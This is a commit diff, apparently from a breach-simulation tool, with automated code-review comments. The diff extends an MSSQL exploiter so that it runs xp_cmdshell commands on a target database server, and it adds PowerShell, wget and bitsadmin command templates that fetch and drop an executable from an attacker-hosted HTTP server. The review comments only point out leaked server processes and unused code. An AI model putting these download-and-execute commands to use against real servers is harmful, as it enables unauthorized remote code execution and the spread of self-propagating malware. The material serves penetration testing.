Payload creation
This commit is contained in:
parent
75f26f921e
commit
d2b5e314c1
|
@ -3,8 +3,12 @@ import logging
|
||||||
|
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
from infection_monkey.exploit.tools import HTTPTools
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
from infection_monkey.model import RDP_CMDLINE_HTTP
|
||||||
|
|
||||||
|
|
||||||
__author__ = 'Maor Rayzin'
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
@ -73,6 +77,31 @@ class MSSQLExploiter(HostExploiter):
|
||||||
|
|
||||||
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Get monkey exe for host and it's path
|
||||||
|
src_path = tools.get_target_monkey(self.host)
|
||||||
|
if not src_path:
|
||||||
|
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||||
|
return False
|
||||||
|
# Create server for http download and wait for it's startup.
|
||||||
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
|
if not http_path:
|
||||||
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
|
return False
|
||||||
|
# TODO choose bit version
|
||||||
|
dst_path = WormConfiguration.dropper_target_path_win_64
|
||||||
|
dst_path = "c:\\windows\\temp\\monkey64.exe"
|
||||||
|
|
||||||
|
command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
|
||||||
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
|
||||||
|
commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
|
||||||
|
commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
|
||||||
|
chosen_attack.execute_command(commands2)
|
||||||
|
|
||||||
|
|
||||||
if chosen_attack.send_payload():
|
if chosen_attack.send_payload():
|
||||||
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||||
if chosen_attack.execute_payload():
|
if chosen_attack.execute_payload():
|
||||||
|
|
|
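Review bot: Both new early `return False` paths leave already-started servers running: `chosen_attack` is constructed on the context line just above, and its `__init__` (touched in the same commit) appears to start an FTP server process via `self.__init_ftp_server(host)`, while neither the `if not http_path` path nor the success path ever stops the `http_thread` returned by `create_locked_transfer`. Whatever stop/join method that thread and the attack's `ftp_server_p` expose should be invoked on every exit of this method, or the transfer should be created only after `src_path` and the attack are known to be usable. `dst_path = WormConfiguration.dropper_target_path_win_64` is overwritten on the next line by a hard-coded literal, which silently discards the configured target path; keep the configured value and drop the literal, or make the TODO say why the literal wins for now. `command` and `commands` are built but never read, and the return value of `chosen_attack.execute_command(commands2)` is discarded, so a failed command still falls through to `send_payload()`. The enclosing method starts and ends outside the hunk.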
@ -5,6 +5,7 @@ import logging
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
from infection_monkey.exploit.tools import get_interface_to_target
|
from infection_monkey.exploit.tools import get_interface_to_target
|
||||||
|
from infection_monkey.network.info import get_free_tcp_port
|
||||||
from pyftpdlib.authorizers import DummyAuthorizer
|
from pyftpdlib.authorizers import DummyAuthorizer
|
||||||
from pyftpdlib.handlers import FTPHandler
|
from pyftpdlib.handlers import FTPHandler
|
||||||
from pyftpdlib.servers import FTPServer
|
from pyftpdlib.servers import FTPServer
|
||||||
|
@ -21,6 +22,8 @@ FTP_SERVER_PASSWORD = 'force'
|
||||||
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
||||||
FTP_WORK_DIR_LINUX = '/tmp/'
|
FTP_WORK_DIR_LINUX = '/tmp/'
|
||||||
|
|
||||||
|
UPLOAD_COMMANDS = []
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
@ -54,7 +57,7 @@ class FTP(object):
|
||||||
handler = FTPHandler
|
handler = FTPHandler
|
||||||
handler.authorizer = authorizer
|
handler.authorizer = authorizer
|
||||||
|
|
||||||
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
|
address = (get_interface_to_target(self.dst_ip), get_free_tcp_port())
|
||||||
|
|
||||||
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||||
self.server = FTPServer(address, handler)
|
self.server = FTPServer(address, handler)
|
||||||
|
@ -103,6 +106,29 @@ class CmdShellAttack(AttackHost):
|
||||||
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
||||||
self.cursor = cursor
|
self.cursor = cursor
|
||||||
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
||||||
|
self.host = host
|
||||||
|
|
||||||
|
def execute_command(self, cmds):
|
||||||
|
ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
|
||||||
|
if ftp_server_p and ftp_server:
|
||||||
|
#command = "xp_cmdshell \""+cmd+"\""
|
||||||
|
#command = "xp_cmdshell \"C:\\download.bat\""
|
||||||
|
#command = "EXEC xp_cmdshell \"c:\\download.bat\""
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Running the cmd on remote host
|
||||||
|
for cmd in cmds:
|
||||||
|
self.cursor.execute(cmd)
|
||||||
|
sleep(0.5)
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
|
return False
|
||||||
|
|
||||||
def send_payload(self):
|
def send_payload(self):
|
||||||
"""
|
"""
|
||||||
|
|
|
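Review bot: `execute_command` starts a second FTP server with `ftp_server, ftp_server_p = self.__init_ftp_server(self.host)` although `__init__` already stores one in `self.ftp_server`/`self.ftp_server_p` (context lines at the top of the hunk); the locals are only truth-tested and never terminated, so every call leaks a server process, and the error branch terminates the instance's server rather than the one it just created. Replace the first two lines of the method body with `if self.ftp_server_p and self.ftp_server:` and drop the extra call, so the `self.ftp_server_p.terminate()` in the error branch refers to the server actually in use. The three commented-out `#command = ...` lines and the unused `e` in `except Exception as e:` should be removed, and `UPLOAD_COMMANDS = []` added in the earlier hunk of this file is a mutable module-level global that nothing on the page reads. I cannot see whether `sleep` is imported in this module; the visible import hunk does not add it. `get_free_tcp_port()` picks the port before `FTPServer` binds it, so a bind failure is still possible and should be handled where `__init_ftp_server` is called rather than assumed away by the truth test.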
@ -18,6 +18,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
|
POWERSHELL_UPLOAD_SHORT = "powershell (new-object System.Net.WebClient).DownloadFile('%(http_path)s','%(monkey_path)s')"
|
||||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
|
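Review bot: `POWERSHELL_UPLOAD_SHORT` is added but nothing in this commit formats it; the exploiter instead inlines a truncated copy of the same `DownloadFile(` command text, so the two will drift apart. Either have the exploiter build its command from this constant with the `%(http_path)s`/`%(monkey_path)s` mapping it already uses for `RDP_CMDLINE_HTTP`, or leave the constant out until it is used. A one-line comment above it stating how it differs from `POWERSHELL_HTTP_UPLOAD` and which callers are meant to use each would help the next reader, since the file now carries two PowerShell download templates.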